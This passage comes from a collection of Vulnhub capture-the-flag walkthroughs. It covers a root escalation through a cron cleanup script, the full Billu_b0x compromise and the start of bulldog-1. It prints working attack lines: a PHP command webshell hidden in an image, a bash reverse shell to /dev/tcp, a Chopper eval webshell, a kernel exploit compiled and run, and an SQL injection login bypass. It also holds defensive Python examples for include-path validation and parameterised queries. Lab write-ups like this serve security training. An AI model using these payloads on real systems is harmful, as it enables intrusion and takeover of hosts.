shell.txt</code></p><p>Then feed shell.txt through tee into tidyup.sh</p><p><code>cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh</code></p><p>Confirm that tidyup.sh was written:</p><p><code>cat /usr/share/cleanup/tidyup.sh</code></p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/57.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) nc listens for the reverse shell; the connection arrives with root privileges. The flag is an image; copy it to the home directory:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/58.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Checking the crontab confirms the job that runs the tidyup.sh cleanup script every 3 minutes:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/59.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Use the JspSpy webshell uploaded earlier to download flair.jpg to Windows:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/60.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(5) View the flag: <code>I NEED TO TALK ABOUT YOUR FLAIR</code>. Done.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/seven/_image/61.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7403' class='md-header-anchor '></a>Summary</h2><h3><a name='header-n7404' class='md-header-anchor '></a>Key breakthroughs</h3><p>(1) Account names and passwords for the CMS and for Tomcat were recovered from page source and from strings inside images.</p><p>(2) Importing the SSL certificate into Wireshark decrypted the SSL traffic and revealed the Tomcat manager URL and credentials.</p><p>(3) The Tomcat manager shell-upload routine should be second nature.</p><p>(4) Privilege escalation: the passwords of two accounts were found, then the tee command and the tidyup.sh cleanup script runnable as root, and a root reverse shell was obtained through the cron job.</p><h3><a name='header-n7413' class='md-header-anchor '></a>Difficulties and pitfalls</h3><p>(1) Exporting the SSL certificate with keytool: this is unusual pentest knowledge, and reading up on how it works and how to use the tool took a lot of time.</p><p>(2) After getting a shell through the Tomcat manager, the uploaded Chopper shell kept getting killed: a few minutes after each upload it was gone. At the time it looked like antivirus or a webshell cleaner; in fact the host's tidyup.sh script cleans up every 3 minutes. A reverse shell gives a shell that persists.</p><p>(3) Running commands through the MySQL connection gave no output: the Chopper command timed out, and in nc the output only appeared on exit. I was about to give up and typed exit, and only then did the output appear, revealing milton's password hash. Just when the road seemed to end, a way opened up.</p><p>(4) Switching accounts twice and then bouncing a root shell took quite some time; finding and using tidyup.sh needs a while.</p><p>(5) Getting a root reverse shell through a crontab job is common in real penetration tests, for instance against Redis running as root with no password, as seen in cryptomining compromises: one can connect with an SSH key or write a root crontab entry for a reverse shell. In Vulnhub this was the first time I met it, and it is hard for beginners.</p><h1><a name='header-n7424' class='md-header-anchor '></a>Section 2: Billu_b0x</h1><h2><a name='header-n7425' 
class='md-header-anchor '></a>Target information</h2><h3><a name='header-n7426' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/billu/Billu_b0x.zip' target='_blank' class='url'>https://download.vulnhub.com/billu/Billu_b0x.zip</a></p><h3><a name='header-n7429' class='md-header-anchor '></a>Description</h3><p>The VM is of medium difficulty, runs Ubuntu (32-bit), and includes these packages: </p><ul><li>PHP</li><li>apache</li><li>MySQL</li></ul><h3><a name='header-n7442' class='md-header-anchor '></a>Goal</h3><p>Boot to root: get into the VM through the web application and obtain root privileges.</p><h3><a name='header-n7445' class='md-header-anchor '></a>Environment</h3><ul><li>Target: opened in VMware, network mode set to NAT, IP obtained automatically.</li><li>Attacking machines: a Windows machine on the same subnet with Nmap, Burp Suite, sqlmap, nc, Python 2.7, DirBuster, AWVS, Nessus and other tools, plus a Kali machine; most of the work is done from Windows.</li></ul><h2><a name='header-n7453' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>Start the Billu_b0x VM. Since it uses NAT, scanning the NAT /24 of the VMware Network Adapter VMnet8 interface with Nmap finds its IP:</p><p><code>nmap -sP 192.168.64.1/24</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Target IP: <code>192.168.64.161</code></p><ul><li>Port and service identification</li></ul><p>Scan all ports 1-65535 with nmap, with service identification and the deeper -A scan, saving the result to a text file:</p><p><code>nmap -p1-65535 -A 192.168.64.161 -oN billu.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Ports and services found on the target:</p><table><tr><th>Port</th><th>Protocol</th><th>Service</th></tr><tr><td>TCP 22</td><td>SSH</td><td>OpenSSH 5.9p1</td></tr><tr><td>TCP 80</td><td>HTTP</td><td>Apache httpd 2.2.22</td></tr></table><p>The web front page shows a username and password form with the hint "Show me your SQLI skills".</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/3.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7488' class='md-header-anchor '></a>Vulnerability hunting</h2><ul><li>Approach:</li></ul><p>(1) SQL injection: the front page hints at injection; find a way to make it work.</p><p>(2) Directory brute-forcing: use DirBuster to find new pages and new vulnerabilities;</p><p>(3) 
Vulnerability scanning: feed the newly found pages to AWVS or AppScan;</p><p>(4) Manual hunting: proxy Firefox through Burp, inspect the requests and responses of the new pages and look for bugs by hand;</p><p>(5) Read every page's source for hints;</p><p>(6) If a username and password turn up, try SSH; if that works there is no need for a reverse shell.</p><ul><li>Step 1: test the front page for SQL injection</li></ul><p>(1) Entering <code>admin' or 'a'='a --</code> as the username with any password does not work; a JavaScript alert says Try again:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Test for POST injection with sqlmap:</p><p><code>sqlmap.py -u "http://192.168.64.161" --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>sqlmap finds no injection. The filtering rules are unknown at this point, and a few sqlmap tampers do not help either. Leave the injection fuzzing for now and brute-force directories instead.</p><ul><li>Step 2: brute-force directories with DirBuster on Windows and dirb on Kali Linux at the same time, to get more results in less time:</li></ul><p>Many pages turn up: test.php, add.php, in.php, c.php, index.php, show.php and so on, plus the directories uploaded_images and phpmy. Visit each in turn:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/6.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/7.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 3: read the PHP source and the passwd file through the file inclusion bug</li></ul><p>(1) test.php says the file parameter is empty and must be supplied</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Testing the inclusion with <code>http://192.168.64.161?file=/etc/passwd</code> fails: it redirects back to the front page.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) In Firefox's HackBar or in Burp Suite, change the GET request to a POST; the inclusion now works and returns the passwd file.</p><p>Posting the data with HackBar downloads the passwd file:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>In Burp Suite, choose Change request method to turn the GET into a POST; the passwd file is returned:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Use the same inclusion to download add.php, in.php, c.php, index.php, show.php, panel.php and so on; the source of each file can then be audited alongside browsing it.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) In passwd there is one account with id 1000, ica, so the SSH username could be ica or root:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/14.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 4: visit add.php and in.php and audit their code</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/15.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>add.php is an upload form, but it does not work: the source shows it is only a page with no server-side handling. in.php is the phpinfo page.</p><ul><li>Step 5: read the c.php source</li></ul><p>This is the database connection file and reveals the MySQL credentials:</p><p>Username: billu</p><p>Password: b0x_billu</p><p>Database: ica_lab</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/17.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 6: logging into phpMyAdmin with the MySQL password fails</li></ul><p>(1) dirb found the /phpmy directory, which serves the phpMyAdmin login page:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/18.jpg' alt='' referrerPolicy='no-referrer' /> 
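</p>
<p>Steps 3 and 7 read /etc/passwd, the PHP sources and the phpMyAdmin configuration through test.php, which includes whatever path the client posts. As an added example, not part of the write-up and not the target's own code, here is the validation a server-side include should do, written in Python: it serves only files under one directory, canonicalises the path so traversal cannot escape it, and optionally restricts includes to a fixed set of template names. The sample tree (a <code>templates/</code> directory next to an <code>uploaded_images/</code> directory) is constructed in a temporary directory.</p>

```python
"""Added example (not from the write-up): the path validation a
server-side include should perform.

test.php and panel.php include whatever path the client names
(file=/etc/passwd, load=/uploaded_images/cmd.jpg). This resolver serves
only files inside one directory, canonicalises the path so traversal and
symlinks cannot escape it, and optionally restricts includes to a fixed
set of template names. The sample tree is constructed in a temp directory.
"""
import os
import tempfile


class IncludeRejected(ValueError):
    """Raised when a requested include fails validation."""


def resolve_include(base_dir, requested, allowed_names=None):
    """Map a client-supplied name to a real file under base_dir or raise."""
    if not requested or os.path.isabs(requested) or "\x00" in requested:
        raise IncludeRejected(f"rejected: {requested!r}")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # realpath resolved '..' and symlinks; the result must still be under base.
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected(f"outside base dir: {requested!r}")
    if allowed_names is not None and os.path.relpath(target, base) not in allowed_names:
        raise IncludeRejected(f"not on allow-list: {requested!r}")
    if not os.path.isfile(target):
        raise IncludeRejected(f"no such template: {requested!r}")
    return target


def try_include(base_dir, requested, allowed_names=None):
    """Return 'ok' or the rejection reason (handy for tests and logging)."""
    try:
        resolve_include(base_dir, requested, allowed_names)
        return "ok"
    except IncludeRejected as exc:
        return str(exc)


def demo_templates_dir():
    """Constructed sample: templates/ with one page, uploaded_images/ next to it."""
    root = tempfile.mkdtemp(prefix="billu_")
    os.makedirs(os.path.join(root, "templates"))
    os.makedirs(os.path.join(root, "uploaded_images"))
    with open(os.path.join(root, "templates", "show.php"), "w") as fh:
        fh.write("show page template (constructed)")
    with open(os.path.join(root, "uploaded_images", "cmd.jpg"), "w") as fh:
        fh.write("GIF89a user upload, never a valid include target (constructed)")
    return os.path.join(root, "templates")


if __name__ == "__main__":
    tpl = demo_templates_dir()
    for req in ("show.php", "/etc/passwd", "../uploaded_images/cmd.jpg"):
        print(f"{req!r}: {try_include(tpl, req)}")
```

<p>The allow-list is the stronger control: with it, even a file that an upload form placed inside the template directory cannot be included, which is exactly the upload-plus-include chain used against panel.php later on this machine.</p>
<p>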
</p><p>Trying the MySQL password on phpMyAdmin does not work. At this point we have an SSH user, ica, and the MySQL account billu with password b0x_billu, yet both the SSH and the phpMyAdmin logins fail.</p><p>The SQL injection bypass has not succeeded either, and the recovered MySQL password does not log into phpMyAdmin.</p><p>Initial guess: the VM is faulty and MySQL did not start properly; the plan is to boot Ubuntu into single-user mode later and investigate.</p><ul><li>Step 7: keep brute-forcing the phpmy directory and include the phpMyAdmin configuration file</li></ul><p>(1) phpMyAdmin's default configuration file is config.inc.php. The path has to be guessed; judging from the URL, the default location should be under /var/www/phpmy.</p><p>(2) Read config.inc.php through the file inclusion from Firefox's HackBar or from Burp Suite. With HackBar:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/19.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>The configuration file contains the root password: roottoor</p><p>(3) With Burp Suite:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/21.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 8: log in as root over SSH with Xshell; the exercise is complete</li></ul><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/22.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 9: investigate the MySQL failure</li></ul><p>Root access is obtained, but the earlier phpMyAdmin login failure pointed at a MySQL fault. After logging in as root, MySQL's status reads: mysql stop/waiting. Presumably the heavily threaded directory brute-forcing and scanning crashed it. Restarting MySQL fails, so the VM is reinstalled.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/23.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After the reinstall, SSH in and MySQL is running normally, but the new VM's IP is now 192.168.64.162.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/24.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 10: back to step 6, log into phpMyAdmin with the MySQL password</li></ul><p>Username: billu, password: b0x_billu; the login succeeds.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/25.jpg' alt='' referrerPolicy='no-referrer' /></p><p>In the auth table of the <code>ica_lab</code> database are the web login credentials: username biLLu, password hEx_it.</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/26.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7650' class='md-header-anchor '></a>Getting a shell</h2><ul><li>Step 11: log into the index page and obtain a command shell and a reverse shell</li></ul><p>(1) Log into the front page with the web credentials; the case must match exactly.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/27.jpg' alt='' referrerPolicy='no-referrer' /></p><p>After login there is an account management page whose two accounts are the captains from Pirates of the Caribbean: Jack Sparrow and Captain Barbossa. As an aside, I prefer Barbossa, a pirate friend who is like an enemy: funny, brave, cunning, domineering and ambitious, always scheming.</p><p>The two accounts' avatar images are served from the directory found earlier: <code>http://192.168.64.162/uploaded_images/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Clicking add user opens an account creation page with an image upload; the idea is to combine the image upload with the file inclusion to get a shell.</p><p>Reviewing the panel.php source obtained earlier through the test.php inclusion shows that panel.php has a local file inclusion bug:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Download one of the images from <code>http://192.168.64.162/uploaded_images/</code>, jack.php, open it in a text editor, insert the one-line command webshell <code>&lt;?php system($_GET['cmd']); ?&gt;</code> in the middle or at the end of the file, and upload it; the upload succeeds.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/30.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) Execute commands through Burp: 
add the command as a URL parameter of the POST request: <code>POST /panel.php?cmd=cat%20/etc/passwd;ls</code></p><p>The POST body references the cmd.jpg image webshell: <code>load=/uploaded_images/cmd.jpg&continue=continue</code></p><p>The command <code>cat /etc/passwd;ls</code> runs successfully</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/31.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(4) Reverse shell with bash</p><p>Command: <code>echo "bash -i >& /dev/tcp/192.168.64.1/4444 0>&1" | bash</code></p><p>The command must be URL-encoded:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Send it in the URL of the POST request:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/33.jpg' alt='' referrerPolicy='no-referrer' /></p><p>nc receives the reverse shell:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/34.jpg' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 12: find a writable directory and drop a Chopper shell</li></ul><p>The upload directory uploaded_images is writable. Change into it and write a Chopper shell: <code>echo '&lt;?php eval($_POST['123456']);?&gt;' >> caidao.php</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/35.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Chopper connects, which makes transferring files convenient.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/36.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7712' class='md-header-anchor '></a>Privilege escalation</h2><ul><li>Step 13: check the kernel and OS version and look for an escalation exploit</li></ul><p>(1) Check the kernel version with <code>uname -a</code> and <code>cat /etc/issue</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/37.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(2) Download the well-known Ubuntu local privilege escalation exploit:</p><p><code>https://www.exploit-db.com/exploits/37292/</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/38.jpg' alt='' referrerPolicy='no-referrer' 
/></p><ul><li>Step 14: compile and escalate</li></ul><p>(1) Grant execute permission </p><p><code>chmod 777 37292.c</code></p><p>(2) Compile the exploit</p><p><code>gcc 37292.c -o exp</code></p><p>(3) Run it to escalate to root</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/39.jpg' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n7744' class='md-header-anchor '></a>Summary</h2><h3><a name='header-n7746' class='md-header-anchor '></a>Other routes</h3><p>There are 3 normal routes to break in.</p><p>Route 1: craft the injection. Obtain the index.php source through the test.php inclusion; it shows how SQL input is filtered, so a targeted injection can be built, after which the shell and the escalation follow.</p><p>(1) Auditing index.php reveals this filter:</p><p><code>$uname=str_replace('\'','',urldecode($_POST['un']));</code></p><p><code>$pass=str_replace('\'','',urldecode($_POST['ps']));</code></p><p>str_replace replaces the string <code>\'</code> with nothing, so an injection login payload must contain <code>\'</code>, otherwise the query errors; urldecode decodes the input.</p><p>(2) The usual login payload is <code>' or 1=1 -- </code>; modify it by appending <code>\'</code>, which str_replace strips.</p><p>Tested with an online PHP debugger:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/40.jpg' alt='' referrerPolicy='no-referrer' /></p><p>(3) The injection succeeds with the payload <code>' or 1=1 -- \'</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/41.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/ten/_image/42.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Getting a shell afterwards is the same as above.</p><p>Route 2: brute-force phpMyAdmin, get the MySQL password from c.php through the file inclusion, log into phpMyAdmin, then get a shell.</p><p>Route 3: include every readable configuration file; the phpMyAdmin configuration yields the root password, then log in over SSH. This works even with MySQL down.</p><ul><li>Pitfalls</li></ul><p>(1) MySQL was knocked over by the heavily threaded directory brute-forcing and injection testing, so phpMyAdmin refused the correct password and a lot of time was lost. This was an accident: two directory brute-forcers and sqlmap running at once used too many threads and killed MySQL.</p><p>(2) For the test.php file inclusion, when GET fails, try POST. Once it works, pull every page's source for auditing.</p><p>(3) The index.php SQL injection cost a lot of time; it later turned out that even without it there are other ways through, as logging into phpMyAdmin bypasses the injection altogether.</p><p>(4) The panel.php file inclusion is easy to miss without reading the source carefully. The test.php inclusion could not be made to trigger the shell.</p><p>(5) File upload plus file inclusion is a common way to get a shell on these targets; with both bugs in hand, a shell comes easily.</p><p>
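</p>
<p>Looking back at Route 1: the index.php filter and the payload can be reasoned about precisely. As an added example, not part of the write-up and not the target's code, the Python below models the filter and the concatenated query and shows the shape MySQL actually parses. One fact worth knowing: in PHP the literal <code>'\''</code> is a single quote character, so the filter strips quotes and leaves backslashes alone; MySQL treats a backslash inside a string literal as an escape, so the trailing backslash of <code>' or 1=1 -- \'</code> swallows the closing quote and the <code>or 1=1</code> lands outside the literal. The second half shows the parameterised query that removes the whole problem, using an in-memory sqlite3 table with the credentials reported on the page (biLLu / hEx_it).</p>

```python
"""Added example (not from the write-up): why the index.php quote filter
fails and what fixes it.

index.php strips quotes with str_replace and then builds
  select * from auth where pass='PS' and uname='UN'
by string concatenation. query_shape() applies MySQL's string-literal rules
(backslash escapes, '' as an escaped quote) to show what the parser really
sees; login_parameterized() is the safe alternative, where the input never
reaches the SQL parser. The auth table is an in-memory stand-in holding the
credentials the page reports.
"""
import sqlite3

TEMPLATE = "select * from auth where pass='{ps}' and uname='{un}'"
PAYLOAD = "' or 1=1 -- \\'"          # the page's payload: quote, SQL, trailing backslash-quote


def php_filter(value):
    """Mirror of str_replace('\\'', '', $value): every single quote is dropped."""
    return value.replace("'", "")


def build_query(un, ps):
    """String concatenation exactly as index.php does it (the vulnerable pattern)."""
    return TEMPLATE.format(ps=php_filter(ps), un=php_filter(un))


def query_shape(sql):
    """Replace MySQL single-quoted literals by ? and cut at a '--' comment.

    Inside a literal a backslash escapes the next character and '' is an
    escaped quote (MySQL default, i.e. without NO_BACKSLASH_ESCAPES).
    """
    out, i, n = [], 0, len(sql)
    while i < n:
        ch = sql[i]
        if ch == "'":
            i += 1
            while i < n:
                if sql[i] == "\\":
                    i += 2
                elif sql.startswith("''", i):
                    i += 2
                elif sql[i] == "'":
                    break
                else:
                    i += 1
            i += 1                      # closing quote (or run past the end)
            out.append("?")
        elif sql.startswith("--", i):
            out.append("-- ...")        # rest of the line is a comment
            break
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def demo_db():
    """In-memory stand-in for ica_lab.auth holding the page's web credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table auth (id integer primary key, uname text, pass text)")
    conn.execute("insert into auth (uname, pass) values (?, ?)", ("biLLu", "hEx_it"))
    return conn


def login_parameterized(conn, un, ps):
    """Safe variant: placeholders carry the values, no quoting or filtering needed."""
    row = conn.execute(
        "select uname from auth where pass=? and uname=?", (ps, un)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(query_shape(build_query("admin", "secret")))
    print(query_shape(build_query(PAYLOAD, PAYLOAD)))
    print(login_parameterized(demo_db(), PAYLOAD, PAYLOAD))
```

<p>With benign input the shape is <code>pass=? and uname=?</code>; with the payload in both fields it becomes <code>pass=? or 1=1 -- ...</code>, which is the login bypass. The parameterised version returns no row for the same payload because the values are bound, not parsed, and the comparison stays case-sensitive, matching the "case must match" observation in step 11.</p>
<p>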
(6) For privilege escalation, pay attention to the main configuration files, database connection files and user files; known Ubuntu vulnerabilities can also be used for local escalation.</p><h1><a name='header-n7794' class='md-header-anchor '></a>Section 3: bulldog-1</h1><h2><a name='header-n7795' class='md-header-anchor '></a>Target information</h2><pre class="md-fences md-end-block" lang="">Author: 紅日安全 (Red Sun Security Team)
First published on Anquanke: https://www.anquanke.com/post/id/106459</pre><h3><a name='header-n7797' class='md-header-anchor '></a>Download link</h3><p><a 
href='https://download.vulnhub.com/bulldog/bulldog.ova' target='_blank' class='url'>https://download.vulnhub.com/bulldog/bulldog.ova</a></p><h3><a name='header-n7800' class='md-header-anchor '></a>Description</h3><p>Bulldog Industries' website was recently defaced by the malicious German Shepherd hackers. Does that mean there are more vulnerabilities to exploit? Why don't you find out? :)</p><p>This is a standard Boot-to-Root; the goal is to get into the root directory and see the congratulatory message.</p><h3><a name='header-n7805' class='md-header-anchor '></a>Goal</h3><p>Get root and the flag.</p><h3><a name='header-n7808' class='md-header-anchor '></a>Environment</h3><ul><li>Target: imported into VirtualBox, network mode bridged to the wireless adapter. On boot it obtains the IP 172.20.10.7.</li><li>Windows attacking machine: the physical host on the wireless network, IP 172.20.10.5, with Burp Suite, nc, Python 2.7, DirBuster and other tools.</li><li>Kali attacking machine: a VMware VM bridged to the wireless adapter, IP 172.20.10.6. Either attacking machine will do.</li></ul><h2><a name='header-n7819' class='md-header-anchor '></a>Information gathering</h2><ul><li>IP discovery</li></ul><p>The target obtains an IP on boot and shows it on the console once booted: 172.20.10.7. No Nmap sweep of the /24 is needed.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/1.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Port and service identification</li></ul><p>Scan all ports 1-65535 with nmap and fingerprint the services, saving the result to a text file:</p><p><code>nmap -p1-65535 -A 172.20.10.7 -oN bulldog.txt</code></p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/2.png' alt='' referrerPolicy='no-referrer' /></p><p>Ports and services found on the target:</p><table><tr><th>Port</th><th>Protocol</th><th>Service</th></tr><tr><td>TCP 23</td><td>SSH</td><td>OpenSSH 7.2p2</td></tr><tr><td>TCP 80</td><td>HTTP</td><td>WSGIServer Python 2.7.12</td></tr><tr><td>TCP 8080</td><td>HTTP</td><td>WSGIServer Python 2.7.12</td></tr></table><p>Operating system: Linux 3.2 - 4.9</p><h2><a name='header-n7850' class='md-header-anchor '></a>Vulnerability hunting</h2><ul><li>Web approach:</li></ul><p>(1) Read every page's source for hints;</p><p>(2) Brute-force directories with DirBuster to find new pages and their vulnerabilities;</p><p>(3) Look for injection or framework bugs: with input fields or URL parameters, AWVS can scan for injection; if the site runs on a CMS framework, only the framework's known vulnerabilities apply, and scanners usually find no injection.</p><ul><li>SSH approach:</li></ul><p>(1) With a username in hand, Hydra or Medusa can brute-force weak passwords, but that needs a strong wordlist and a weak password to exist.</p><p>(2) With web admin or system credentials, try SSH; if that works there is no need for a reverse shell.</p><ul><li>Step 1: browse the site and brute-force directories</li></ul><p>(1) Visit <code>http://172.20.10.7/</code> for the front page:</p><p><img 
src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/3.png' alt='' referrerPolicy='no-referrer' /></p><p>The front page links to a notice page, which contains nothing of value.</p><p>(2) Brute-forcing directories with DirBuster yields dev and admin:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/4.png' alt='' referrerPolicy='no-referrer' /></p><p>(3) <code>http://172.20.10.7/admin</code> is a Django admin backend requiring a username and password. A few common weak passwords fail; hold off on brute-forcing and look at the other pages first.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/5.png' alt='' referrerPolicy='no-referrer' /></p><p>(4) <code>http://172.20.10.7/dev</code> is rich in useful information, chiefly:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/6.png' alt='' referrerPolicy='no-referrer' /></p><p>The new system no longer uses PHP or any CMS but is built on the Django framework. That makes web injection bugs unlikely, leaving only Django framework vulnerabilities; with no PHP there is no point hunting PHP bugs or writing PHP webshells.</p><p>The new system is administered through a webshell: there is a Web-shell link to <code>http://172.20.10.7/dev/shell/</code>, but it requires authentication.</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/7.png' alt='' referrerPolicy='no-referrer' /></p><ul><li>Step 2: crack the hashes</li></ul><p>(1) The source of <code>http://172.20.10.7/dev</code> contains the e-mail address and hash of each Team Lead:</p><p><img src='https://raw.githubusercontent.com/redBu1l/Redclub-Launch/master/vulnhub/three/_image/8.png' alt='' referrerPolicy='no-referrer' /></p><p>along with an unmistakable hint in English: We'll remove these in prod. 
